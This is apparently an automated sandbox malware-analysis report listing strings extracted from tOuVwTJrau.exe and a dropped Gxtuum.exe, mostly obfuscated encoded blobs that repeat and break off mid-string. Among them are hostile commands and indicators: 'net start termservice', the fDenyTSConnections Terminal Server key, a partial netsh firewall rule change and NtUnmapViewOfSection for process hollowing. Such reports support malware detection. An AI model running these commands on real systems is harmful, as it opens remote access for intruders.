SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: tOuVwTJrau.exe, 00000000.00000000.1666310051.0000000000331000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: tOuVwTJrau.exe, 00000000.00000000.1666310051.0000000000331000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: tOuVwTJrau.exe, 00000000.00000003.1671013715.0000000006E01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: tOuVwTJrau.exe, 00000000.00000003.1671013715.0000000006E01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000001.00000000.1673692294.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.1673692294.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.1676955540.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.1676955540.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet 